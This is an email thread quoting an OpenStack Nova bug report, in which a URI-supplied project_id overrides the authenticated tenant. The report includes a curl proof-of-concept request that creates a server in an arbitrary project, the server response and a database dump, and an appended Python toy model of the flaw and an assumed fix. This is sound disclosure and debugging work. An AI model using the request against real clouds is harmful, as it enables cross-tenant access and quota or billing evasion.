Comments below

On Dec 16, 2011, at 1:30 PM, anotherjesse wrote:
> ttx
>
> 1) you still need to be authenticated. The keystone middleware doesn't
> let the request hit the router if you fail to auth.
>
> 2) you can issue any openstack api request against any tenant.
>
> Because most logic in the API uses the context (not the URL) to specify
> the resources you are interacting with (for example list servers uses
> the tenant from the context)
>
> instance_list = self.compute_api.get_all(context,
> search_opts=search_opts)
>
> https://github.com/openstack/nova/blob/master/nova/api/openstack/v2/servers.py#L145
>
> So you can create a server in another project but delete, list, show
> (and most other api calls) will not be able to modify it via the api.
> This is because the way that the database layer is written is defensive
> - it only lets you access data that your context says you have access
> to.
>
> This is still bad in that it allows creation of resources outside of
> your project (for quota/billing avoidance) and there could be more
> tunnels.
I believe this is incorrect. The broken code actually sets context.project_id to whatever was in the url, so I think you can list and terminate instances in other projects as well.
>
> 3) only affects you if you are using the openstack api with keystone (not
> deprecated auth)
>
> It shouldn't affect people who use the default (which is nova's internal
> legacy auth) or who use the ec2 api
legacy auth is also broken afaik, because it will successfully authenticate and then the authentication will be overwritten by the url. EC2 auth shouldn't be affected.
>
> --
> You received this bug notification because you are a member of Nova
> Core, which is subscribed to the bug report.
> https://bugs.launchpad.net/bugs/904072
>
> Title:
> project_id could be overwritten to any value by URI value
>
> Status in OpenStack Compute (Nova):
> Confirmed
>
> Bug description:
> project_id could be overwritten to any value by URI value.
> User can create a server on any project (even if it does not exist)
> The quota function will not work because of this bug. (So this bug is a security vulnerability.)
>
> --Test condition
> user : demo (not admin)
> project_id: 2
>
> -- Request
> stack@freecloud116:~/devstack$ curl -H "Content-type: application/json" -H "x-auth-token: 8bbdb554-a671-446e-a6c2-07326eeb9ad5" -d '{"server": {"min_count": 1, "flavorRef": "1", "name": "test5", "imageRef": "2", "max_count": 1}}' http://localhost:8774/v1.1/tushar2/servers <-- invalid tenant_id
>
> -- Response
> {"server": {"status": "BUILD", "updated": "2011-12-14T03:06:04Z", "hostId": "", "user_id": "demo", "name": "test5", "links": [{"href": "http://localhost:8774/v1.1/tushar2/servers/7", "rel": "self"}, {"href": "http://localhost:8774/tushar2/servers/7", "rel": "bookmark"}], "addresses": {}, "tenant_id": "tushar2", "image": {"id": "2", "links": [{"href": "http://localhost:8774/tushar2/images/2", "rel": "bookmark"}]}, "created": "2011-12-14T03:06:04Z", "uuid": "5b63c965-8966-4ebc-ae1b-1c1c551a044c", "accessIPv4": "", "accessIPv6": "", "key_name": null, "adminPass": "id8SngCb7xeRq67K", "progress": 0, "flavor": {"id": "1", "links": [{"href": "http://localhost:8774/tushar2/flavors/1", "rel": "bookmark"}]}, "config_drive": "", "id": 7, "metadata": {}}}stack@freecloud116:~/devstack$
>
> -- DB result
> instance with project_id "tushar2" is created
>
> mysql> select id,project_id from instances;
> +----+------------+
> | id | project_id |
> +----+------------+
> | 1 | demo5 |
> | 2 | demo5 |
> | 3 | tushar |
> | 4 | tushar1 |
> | 5 | tushar2 |
> | 6 | tushar2 |
> | 7 | tushar2 |
> +----+------------+
> 7 rows in set (0.00 sec)
>
> --Cause of this bug
> This code set project_id to request object from uri
> https://github.com/openstack/nova/blob/master/nova/api/openstack/v2/__init__.py#L78
>
> Then this code set the project_id to context object
> https://github.com/openstack/nova/blob/master/nova/api/openstack/wsgi.py#L554
>
> To manage notifications about this bug go to:
> https://bugs.launchpad.net/nova/+bug/904072/+subscriptions
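Since the whole disagreement above is about where context.project_id comes from, here is a small stand-alone Python model of the request pipeline, added as an example. It is not nova code and not taken from the bug report: the fake keystone middleware, router, controllers and "defensive" DB layer, the token table and the instance rows are all made up for illustration. The trust_uri=True path reproduces the reported behaviour (the URI tenant overwrites the token's tenant); the trust_uri=False path is one assumed way to close the hole (require the URI tenant to match the token's tenant unless the caller is admin), not necessarily the patch nova actually shipped.

```python
"""Toy model of the project_id/URI confusion discussed in bug 904072.
Added example, not nova code; all names and data are constructed."""
import re
from dataclasses import dataclass

# Constructed sample data (made up for this example).
TOKENS = {
    "tok-demo": {"user_id": "demo", "project_id": "demo5", "is_admin": False},
    "tok-admin": {"user_id": "admin", "project_id": "admin", "is_admin": True},
}
INSTANCES = [
    {"id": 1, "project_id": "demo5"},
    {"id": 2, "project_id": "demo5"},
    {"id": 3, "project_id": "tushar"},
    {"id": 4, "project_id": "tushar1"},
]
DEMO = {"x-auth-token": "tok-demo"}
ADMIN = {"x-auth-token": "tok-admin"}

# v1.1 URLs carry the tenant in the path: /v1.1/<project_id>/servers
PROJECT_ROUTE = re.compile(r"^/v1\.1/(?P<project_id>[^/]+)/servers$")


@dataclass
class RequestContext:
    user_id: str
    project_id: str
    is_admin: bool = False


class Unauthorized(Exception):
    """Bad or missing token; the request never reaches the router."""


class Forbidden(Exception):
    """Authenticated, but not allowed to touch this project."""


def auth_middleware(headers):
    """Stand-in for the keystone middleware: validate the token, build the context."""
    token = TOKENS.get(headers.get("x-auth-token"))
    if token is None:
        raise Unauthorized("invalid or missing x-auth-token")
    return RequestContext(**token)


def build_context(headers, path, trust_uri):
    """Authenticate, then route.
    trust_uri=True reproduces the bug: the URI project_id silently replaces
    the tenant the token was issued for. trust_uri=False is an assumed fix:
    the URI tenant must match the token's tenant unless the caller is admin."""
    context = auth_middleware(headers)
    match = PROJECT_ROUTE.match(path)
    if match is None:
        raise LookupError("no route for %s" % path)
    url_project = match.group("project_id")
    if trust_uri or context.is_admin:
        context.project_id = url_project
    elif url_project != context.project_id:
        raise Forbidden("URI project %s != token project %s" % (url_project, context.project_id))
    return context


def db_instance_get_all_by_project(context, project_id):
    """Stand-in for the defensive DB layer: it only trusts context.project_id,
    so once that field comes from the URI the check is satisfied trivially."""
    if not context.is_admin and project_id != context.project_id:
        raise Forbidden("context may not read project %s" % project_id)
    return [row for row in INSTANCES if row["project_id"] == project_id]


def list_servers(context):
    """Controller: like servers.py, takes the tenant from the context, not the URL."""
    return db_instance_get_all_by_project(context, context.project_id)


def create_server(context, name, store):
    """Controller: the new row is stamped with whatever project_id the context carries."""
    row = {"id": len(store) + 1, "project_id": context.project_id, "name": name}
    store.append(row)
    return row


def probe_list(headers, path, trust_uri):
    """Run a list request through the pipeline; fold the outcome into a tuple."""
    try:
        context = build_context(headers, path, trust_uri)
        return ("ok", sorted(row["id"] for row in list_servers(context)))
    except Unauthorized:
        return ("401", [])
    except Forbidden:
        return ("403", [])


def probe_create(headers, path, trust_uri, name="test5"):
    """Run the create request from the report; return the project_id the row
    landed in, or the error code."""
    try:
        context = build_context(headers, path, trust_uri)
    except Unauthorized:
        return "401"
    except Forbidden:
        return "403"
    return create_server(context, name, [])["project_id"]
```

With trust_uri=True the demo token lists project "tushar" and creates a server under the nonexistent project "tushar2", exactly the shape of the curl in the report, because the DB layer's check compares the target project against a context field the URL just set. With trust_uri=False the same requests get a 403 while a bad token still gets a 401 before routing, and an admin can still address another tenant through the URL.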